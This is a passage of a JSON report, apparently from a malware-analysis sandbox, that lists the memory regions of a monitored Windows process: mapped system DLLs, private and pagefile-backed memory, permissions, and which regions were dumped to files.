"wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1941176320, "timestamp": "00:00:47.137", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_591", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:47.153", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 880639, "entry_point": 458752, "filename": "\\Windows\\System32\\locale.nls", "id": "region_592", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 458752, "timestamp": "00:00:47.153", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000593-addr_0x00000000005f0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_153", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 6225920, "type": "region", "version": 1 }, "end_va": 7274495, "entry_point": 0, "filename": null, "id": "region_593", "name": "private_0x00000000005f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 6225920, "timestamp": "00:00:47.154", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000594-addr_0x00000000008c0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_154", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 9175040, "type": "region", "version": 1 }, "end_va": 9240575, "entry_point": 0, "filename": null, "id": "region_594", "name": "private_0x00000000008c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 9175040, "timestamp": "00:00:47.155", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1963655168, "type": "region", "version": 1 }, "end_va": 1963704319, "entry_point": 1963659489, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_595", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1963655168, "timestamp": "00:00:47.155", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1963720704, "type": "region", "version": 1 }, "end_va": 1964113919, "entry_point": 1963828147, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_596", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1963720704, "timestamp": "00:00:47.155", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1964113920, "type": "region", "version": 1 }, "end_va": 1965162495, "entry_point": 1964226285, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_597", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1964113920, "timestamp": "00:00:47.156", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1965293568, "type": "region", "version": 1 }, "end_va": 1965395967, "entry_point": 1965312373, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_598", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1965293568, "timestamp": "00:00:47.156", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1965424640, "type": "region", "version": 1 }, "end_va": 1966129151, "entry_point": 1965466738, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_599", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1965424640, "timestamp": "00:00:47.156", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1966211072, "type": "region", "version": 1 }, "end_va": 1966497791, "entry_point": 1966240888, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_600", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1966211072, "timestamp": "00:00:47.157", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1966866432, "type": "region", "version": 1 }, "end_va": 1967849471, "entry_point": 1966933353, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_601", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1966866432, "timestamp": "00:00:47.157", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 1968046080, "type": "region", "version": 1 }, "end_va": 1968635903, "entry_point": 1968137027, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_602", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1968046080, "timestamp": "00:00:47.158", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1968635904, "type": "region", "version": 1 }, "end_va": 1970061311, "entry_point": 1968945725, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_603", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1968635904, "timestamp": "00:00:47.159", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1985675264, "type": "region", "version": 1 }, "end_va": 1986789375, "entry_point": 1985753811, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_604", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985675264, "timestamp": "00:00:47.159", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1987379200, "type": "region", "version": 1 }, "end_va": 1987420159, "entry_point": 1987393184, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_605", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1987379200, "timestamp": "00:00:47.160", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1987444736, "type": "region", "version": 1 }, "end_va": 1988100095, "entry_point": 1987529189, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_606", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1987444736, "timestamp": "00:00:47.160", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1991442432, "type": "region", "version": 1 }, "end_va": 1992085503, "entry_point": 1991655383, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_607", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1991442432, "timestamp": "00:00:47.160", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000608-addr_0x0000000077160000-size_0x00000000000fa000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_155", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1024000, "start_va": 1997930496, "type": "region", "version": 1 }, "end_va": 1998954495, "entry_point": 0, "filename": null, "id": "region_608", "name": "private_0x0000000077160000", "norm_filename": null, "region_type": "private_memory", "start_va": 1997930496, "timestamp": "00:00:47.161", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000609-addr_0x0000000077260000-size_0x000000000011f000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_156", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1175552, "start_va": 1998979072, "type": "region", "version": 1 }, "end_va": 2000154623, "entry_point": 0, "filename": null, "id": "region_609", "name": "private_0x0000000077260000", "norm_filename": null, "region_type": "private_memory", "start_va": 1998979072, "timestamp": "00:00:47.161", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_610", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:00:47.161", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_611", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:00:47.162", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 7274496, "type": "region", "version": 1 }, "end_va": 8880127, "entry_point": 0, "filename": null, "id": "region_612", "name": "pagefile_0x00000000006f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7274496, "timestamp": "00:00:47.165", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1990197248, "type": "region", "version": 1 }, "end_va": 1991032831, "entry_point": 1990203019, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_613", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1990197248, "timestamp": "00:00:47.165", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1991049216, "type": "region", "version": 1 }, "end_va": 1991442431, "entry_point": 1991120271, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_614", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1991049216, "timestamp": "00:00:47.166", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000615-addr_0x0000000000020000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_157", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_615", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:00:47.170", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000616-addr_0x0000000000030000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_158", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 200703, "entry_point": 0, "filename": null, "id": "region_616", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:00:47.170", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 9240576, "type": "region", "version": 1 }, "end_va": 10817535, "entry_point": 0, "filename": null, "id": "region_617", "name": "pagefile_0x00000000008d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 9240576, "timestamp": "00:00:47.170", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 10878976, "type": "region", "version": 1 }, "end_va": 31850495, "entry_point": 0, "filename": null, "id": "region_618", "name": "pagefile_0x0000000000a60000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 10878976, "timestamp": "00:00:47.171", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36884480, "start_va": 31850496, "type": "region", "version": 1 }, "end_va": 68734975, "entry_point": 0, "filename": null, "id": "region_619", "name": "private_0x0000000001e60000", "norm_filename": null, "region_type": "private_memory", "start_va": 31850496, "timestamp": "00:00:47.171", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1966604288, "type": "region", "version": 1 }, "end_va": 1966821375, "entry_point": 1966609501, "filename": "\\Windows\\SysWOW64\\ws2_32.dll", "id": "region_620", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\syswow64\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1966604288, "timestamp": "00:00:47.172", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1992097792, "type": "region", "version": 1 }, "end_va": 1992122367, "entry_point": 1992103810, "filename": "\\Windows\\SysWOW64\\nsi.dll", "id": "region_621", "name": "nsi.dll", "norm_filename": "c:\\windows\\syswow64\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1992097792, "timestamp": "00:00:47.173", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000622-addr_0x00000000001a0000-size_0x00000000000d0000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_159", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 851968, "start_va": 1703936, "type": "region", "version": 1 }, "end_va": 2555903, "entry_point": 0, "filename": null, "id": "region_622", "name": "private_0x00000000001a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1703936, "timestamp": "00:00:47.174", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1997537280, "type": "region", "version": 1 }, "end_va": 1997893631, "entry_point": 1997642662, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_623", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1997537280, "timestamp": "00:00:47.175", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1003520, "start_va": 1992163328, "type": "region", "version": 1 }, "end_va": 1993166847, "entry_point": 1992169573, "filename": "\\Windows\\SysWOW64\\wininet.dll", "id": "region_624", "name": "wininet.dll", "norm_filename": "c:\\windows\\syswow64\\wininet.dll", "region_type": "memory_mapped_file", "start_va": 1992163328, "timestamp": "00:00:47.176", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1269760, "start_va": 1984364544, "type": "region", "version": 1 }, "end_va": 1985634303, "entry_point": 1984371509, "filename": "\\Windows\\SysWOW64\\urlmon.dll", "id": "region_625", "name": "urlmon.dll", "norm_filename": "c:\\windows\\syswow64\\urlmon.dll", "region_type": "memory_mapped_file", "start_va": 1984364544, "timestamp": "00:00:47.177", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1983774720, "type": "region", "version": 1 }, "end_va": 1984360447, "entry_point": 1983791025, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_626", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1983774720, "timestamp": "00:00:47.178", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1167360, "start_va": 1989017600, "type": "region", "version": 1 }, "end_va": 1990184959, "entry_point": 1989023114, "filename": "\\Windows\\SysWOW64\\crypt32.dll", "id": "region_627", "name": "crypt32.dll", "norm_filename": "c:\\windows\\syswow64\\crypt32.dll", "region_type": "memory_mapped_file", "start_va": 1989017600, "timestamp": "00:00:47.179", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 2001928192, "type": "region", "version": 1 }, "end_va": 2001977343, "entry_point": 2001937294, "filename": "\\Windows\\SysWOW64\\msasn1.dll", "id": "region_628", "name": "msasn1.dll", "norm_filename": "c:\\windows\\syswow64\\msasn1.dll", "region_type": "memory_mapped_file", "start_va": 2001928192, "timestamp": "00:00:47.180", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2076672, "start_va": 1993539584, "type": "region", "version": 1 }, "end_va": 1995616255, "entry_point": 1993548505, "filename": "\\Windows\\SysWOW64\\iertutil.dll", "id": "region_629", "name": "iertutil.dll", "norm_filename": "c:\\windows\\syswow64\\iertutil.dll", "region_type": "memory_mapped_file", "start_va": 1993539584, "timestamp": "00:00:47.181", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 172032, "start_va": 1970667520, "type": "region", "version": 1 }, "end_va": 1970839551, "entry_point": 1970672378, "filename": "\\Windows\\SysWOW64\\imagehlp.dll", "id": "region_630", "name": "imagehlp.dll", "norm_filename": "c:\\windows\\syswow64\\imagehlp.dll", "region_type": "memory_mapped_file", "start_va": 1970667520, "timestamp": "00:00:47.184", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000631-addr_0x00000000000e0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_160", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 1179647, "entry_point": 0, "filename": null, "id": "region_631", "name": "private_0x00000000000e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 917504, "timestamp": "00:00:47.188", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 1956970496, "type": "region", "version": 1 }, "end_va": 1957064703, "entry_point": 1956977821, "filename": "\\Windows\\SysWOW64\\userenv.dll", "id": "region_632", "name": "userenv.dll", "norm_filename": "c:\\windows\\syswow64\\userenv.dll", "region_type": "memory_mapped_file", "start_va": 1956970496, "timestamp": "00:00:47.189", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 1960837120, "type": "region", "version": 1 }, "end_va": 1960882175, "entry_point": 1960843666, "filename": "\\Windows\\SysWOW64\\profapi.dll", "id": "region_633", "name": "profapi.dll", "norm_filename": "c:\\windows\\syswow64\\profapi.dll", "region_type": "memory_mapped_file", "start_va": 1960837120, "timestamp": "00:00:47.190", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 68747264, "type": "region", "version": 1 }, "end_va": 71692287, "entry_point": 68747264, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_634", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 68747264, "timestamp": "00:00:47.478", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000635-addr_0x0000000000370000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_161", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 3604480, "type": "region", "version": 1 }, "end_va": 3866623, "entry_point": 0, "filename": null, "id": "region_635", "name": "private_0x0000000000370000", "norm_filename": null, "region_type": "private_memory", "start_va": 3604480, "timestamp": "00:00:47.482", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000636-addr_0x0000000000490000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_162", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 4784128, "type": "region", "version": 1 }, "end_va": 5046271, "entry_point": 0, "filename": null, "id": "region_636", "name": "private_0x0000000000490000", "norm_filename": null, "region_type": "private_memory", "start_va": 4784128, "timestamp": "00:00:47.483", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000637-addr_0x000000007efd8000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_163", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_637", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:00:47.483", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 524288, "start_va": 1938489344, "type": "region", "version": 1 }, "end_va": 1939013631, "entry_point": 1938569161, "filename": "\\Windows\\SysWOW64\\uxtheme.dll", "id": "region_638", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\syswow64\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 1938489344, "timestamp": "00:00:47.484", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000639-addr_0x0000000000270000-size_0x00000000000e0000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_164", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 917504, "start_va": 2555904, "type": "region", "version": 1 }, "end_va": 3473407, "entry_point": 0, "filename": null, "id": "region_639", "name": "private_0x0000000000270000", "norm_filename": null, "region_type": "private_memory", "start_va": 2555904, "timestamp": "00:00:47.486", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 5046272, "type": "region", "version": 1 }, "end_va": 5959679, "entry_point": 0, "filename": null, "id": "region_640", "name": "pagefile_0x00000000004d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5046272, "timestamp": "00:00:47.487", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000641-addr_0x00000000002b0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_165", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 2818048, "type": "region", "version": 1 }, "end_va": 3080191, "entry_point": 0, "filename": null, "id": "region_641", "name": "private_0x00000000002b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2818048, "timestamp": "00:00:47.495", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000642-addr_0x0000000000310000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_166", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 3211264, "type": "region", "version": 1 }, "end_va": 3473407, "entry_point": 0, "filename": null, "id": "region_642", "name": "private_0x0000000000310000", "norm_filename": null, "region_type": "private_memory", "start_va": 3211264, "timestamp": "00:00:47.495", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000643-addr_0x00000000003c0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_167", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 3932160, "type": "region", "version": 1 }, "end_va": 4194303, "entry_point": 0, "filename": null, "id": "region_643", "name": "private_0x00000000003c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3932160, "timestamp": "00:00:47.496", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000644-addr_0x0000000004490000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_168", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 71892992, "type": "region", "version": 1 }, "end_va": 72155135, "entry_point": 0, "filename": null, "id": "region_644", "name": "private_0x0000000004490000", "norm_filename": null, "region_type": "private_memory", "start_va": 71892992, "timestamp": "00:00:47.496", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000645-addr_0x00000000045e0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_169", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 73269248, "type": "region", "version": 1 }, "end_va": 73531391, "entry_point": 0, "filename": null, "id": "region_645", "name": "private_0x00000000045e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 73269248, "timestamp": "00:00:47.496", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000646-addr_0x000000007efd5000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], 